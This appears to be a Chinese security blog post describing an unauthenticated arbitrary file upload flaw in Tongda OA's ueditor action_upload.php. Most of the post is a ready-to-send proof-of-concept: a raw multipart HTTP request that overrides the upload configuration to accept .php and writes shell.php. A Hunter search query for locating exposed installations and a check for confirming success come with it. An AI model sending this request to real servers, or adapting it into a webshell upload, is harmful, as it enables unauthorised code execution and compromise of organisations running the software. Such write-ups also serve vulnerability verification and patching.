Babing
Published on 2024-08-30 / 3 Visits
0
0

T10-12通达-OA-文件上传

T10-12通达-OA-文件上传

漏洞描述:

action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。

网站图片:

image-20240625142756250

网络测绘:

Hunter 语法:

app.name=“通达 OA”

漏洞复现:

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_371
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 605

--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

filename
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

10000
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

shell
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
--00content0boundary00
Content-Disposition: form-data; name="mufile"

submit
--00content0boundary00
Content-Disposition: form-data; name="filename"; filename="shell.php"

<?php echo 123;?>
--00content0boundary00--

image.png
上传文件地址为http://ip/shell.php,发起get请求上传后文件地址,响应200,表示存在该漏洞,否则不存在
image.png


Comment